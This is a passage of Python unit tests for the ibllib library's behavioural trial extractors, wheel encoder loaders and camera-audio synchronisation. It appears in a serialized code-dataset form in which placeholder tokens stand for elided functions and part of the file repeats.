biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n 
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n 
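# alfio.check_dimensions is used as a status code here: 0 means every\n        # attribute of the loaded trials object shares the same first\n        # dimension (one row per trial); any mismatch yields nonzero.\n        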
extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = 
tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 
21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n 
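# Expected values are the session's BLOCK_PROBABILITY_SET plus 0.5 for\n        # the unbiased block; only the biased branches below assert\n        # membership explicitly, the training ones just check the dtype.\n        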
self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, 
np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, 
np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = 
raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, 